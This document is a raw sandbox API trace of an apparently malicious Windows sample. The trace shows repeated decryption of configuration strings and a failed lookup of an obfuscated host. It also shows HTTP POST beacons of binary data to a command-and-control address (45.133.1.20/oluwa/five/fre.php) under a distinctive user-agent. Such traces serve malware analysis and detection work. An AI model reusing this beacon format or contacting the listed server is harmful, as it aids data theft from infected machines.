[0318.596] recv (in: s=0xc4c, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0318.664] GetProcessHeap () returned 0x6a0000 [0318.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0318.665] GetProcessHeap () returned 0x6a0000 [0318.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0318.666] GetProcessHeap () returned 0x6a0000 [0318.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dfc28 | out: hHeap=0x6a0000) returned 1 [0318.668] GetProcessHeap () returned 0x6a0000 [0318.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0318.668] closesocket (s=0xc4c) returned 0 [0318.669] GetProcessHeap () returned 0x6a0000 [0318.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa40 | out: hHeap=0x6a0000) returned 1 [0318.669] GetProcessHeap () returned 0x6a0000 [0318.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.670] GetProcessHeap () returned 0x6a0000 [0318.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0318.671] GetProcessHeap () returned 0x6a0000 [0318.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0318.672] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b4) returned 0xc4c [0318.674] Sleep (dwMilliseconds=0xea60) [0318.675] GetProcessHeap () returned 0x6a0000 [0318.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0318.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.676] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.685] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0318.694] GetProcessHeap () returned 0x6a0000 [0318.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0318.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.695] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.696] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.697] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.697] GetProcessHeap () returned 0x6a0000 [0318.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0318.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.698] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0318.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.699] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.700] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0318.700] GetProcessHeap () returned 0x6a0000 [0318.700] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.700] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.701] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0318.702] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.702] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0318.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0318.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.718] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0318.718] GetProcessHeap () returned 0x6a0000 [0318.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0318.718] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0318.719] GetProcessHeap () returned 0x6a0000 [0318.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0318.719] GetProcessHeap () returned 0x6a0000 [0318.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.719] GetProcessHeap () returned 0x6a0000 [0318.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0318.720] GetProcessHeap () returned 0x6a0000 [0318.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0318.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.728] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0318.760] GetProcessHeap () returned 0x6a0000 [0318.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0318.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.764] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0318.764] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.765] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.766] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.766] GetProcessHeap () returned 0x6a0000 [0318.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0318.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.767] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0318.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.768] CryptDestroyKey (hKey=0x6ad020) returned 1 [0318.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.769] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0318.769] GetProcessHeap () returned 0x6a0000 [0318.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0318.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.775] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0318.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.775] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0318.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.776] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0318.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0318.777] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0318.777] GetProcessHeap () returned 0x6a0000 [0318.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0318.777] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0318.778] GetProcessHeap () returned 0x6a0000 [0318.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0318.778] socket (af=2, type=1, protocol=6) returned 0xc50 [0318.778] connect (s=0xc50, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0318.803] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0318.803] GetProcessHeap () returned 0x6a0000 [0318.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0318.803] GetProcessHeap () returned 0x6a0000 [0318.803] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0318.804] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.805] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0318.805] GetProcessHeap () returned 0x6a0000 [0318.807] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df0e8 [0318.807] GetProcessHeap () returned 0x6a0000 [0318.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.808] GetProcessHeap () returned 0x6a0000 [0318.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0318.808] GetProcessHeap () returned 0x6a0000 [0318.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0318.808] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0318.809] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0318.809] GetProcessHeap () returned 0x6a0000 [0318.809] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0318.809] GetProcessHeap () returned 0x6a0000 [0318.810] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0318.810] send (s=0xc50, buf=0x6bd460*, len=242, flags=0) returned 242 [0318.811] send (s=0xc50, buf=0x6bb998*, len=159, flags=0) returned 159 [0318.811] GetProcessHeap () returned 0x6a0000 [0318.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0318.811] recv (in: s=0xc50, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0318.882] GetProcessHeap () returned 0x6a0000 [0318.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0318.884] GetProcessHeap () returned 0x6a0000 [0318.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0318.884] GetProcessHeap () returned 0x6a0000 [0318.884] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df0e8 | out: hHeap=0x6a0000) returned 1 [0318.885] GetProcessHeap () returned 0x6a0000 [0318.885] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0318.885] closesocket (s=0xc50) returned 0 [0318.886] GetProcessHeap () returned 0x6a0000 [0318.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0318.886] GetProcessHeap () returned 0x6a0000 [0318.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0318.887] GetProcessHeap () returned 0x6a0000 [0318.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0318.887] GetProcessHeap () returned 0x6a0000 [0318.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0318.888] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19b8) returned 0xc50 [0318.890] Sleep (dwMilliseconds=0xea60) [0318.891] GetProcessHeap () returned 0x6a0000 [0318.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0318.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.893] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0318.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0318.991] GetProcessHeap () returned 0x6a0000 [0318.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0318.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.994] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0318.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0318.996] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.996] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0318.996] GetProcessHeap () returned 0x6a0000 [0318.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0318.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0318.998] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0318.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.000] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0319.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.001] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0319.001] GetProcessHeap () returned 0x6a0000 [0319.001] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.003] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0319.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.007] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0319.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.008] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0319.010] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.010] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0319.010] GetProcessHeap () returned 0x6a0000 [0319.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0319.010] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0319.011] GetProcessHeap () returned 0x6a0000 [0319.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0319.012] GetProcessHeap () returned 0x6a0000 [0319.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0319.012] GetProcessHeap () returned 0x6a0000 [0319.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0319.012] GetProcessHeap () returned 0x6a0000 [0319.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0319.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.014] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0319.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.021] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0319.031] GetProcessHeap () returned 0x6a0000 [0319.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0319.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.033] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0319.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.035] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0319.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.039] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0319.039] GetProcessHeap () returned 0x6a0000 [0319.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0319.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.041] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0319.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.042] CryptDestroyKey (hKey=0x6ad020) returned 1 [0319.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0319.043] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0319.044] GetProcessHeap () returned 0x6a0000 [0319.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0319.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.045] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0319.046] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.046] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0319.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.050] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0319.051] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0319.051] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0319.051] GetProcessHeap () returned 0x6a0000 [0319.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0319.052] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0319.052] GetProcessHeap () returned 0x6a0000 [0319.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0319.052] socket (af=2, type=1, protocol=6) returned 0xc54 [0319.052] connect (s=0xc54, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0319.239] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0319.239] GetProcessHeap () returned 0x6a0000 [0319.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0319.239] GetProcessHeap () returned 0x6a0000 [0319.239] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0319.240] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.241] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0319.241] GetProcessHeap () returned 0x6a0000 [0319.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df868 [0319.241] GetProcessHeap () returned 0x6a0000 [0319.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.242] GetProcessHeap () returned 0x6a0000 [0319.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0319.242] GetProcessHeap () returned 0x6a0000 [0319.242] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0319.243] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0319.247] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0319.247] GetProcessHeap () returned 0x6a0000 [0319.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0319.247] GetProcessHeap () returned 0x6a0000 [0319.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0319.248] send (s=0xc54, buf=0x6bd460*, len=242, flags=0) returned 242 [0319.248] send (s=0xc54, buf=0x6bb998*, len=159, flags=0) returned 159 [0319.249] GetProcessHeap () returned 0x6a0000 [0319.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0319.249] recv (in: s=0xc54, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0319.325] GetProcessHeap () returned 0x6a0000 [0319.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0319.327] GetProcessHeap () returned 0x6a0000 [0319.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0319.327] GetProcessHeap () returned 0x6a0000 [0319.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df868 | out: hHeap=0x6a0000) returned 1 [0319.327] GetProcessHeap () returned 0x6a0000 [0319.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0319.328] closesocket (s=0xc54) returned 0 [0319.328] GetProcessHeap () returned 0x6a0000 [0319.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0319.328] 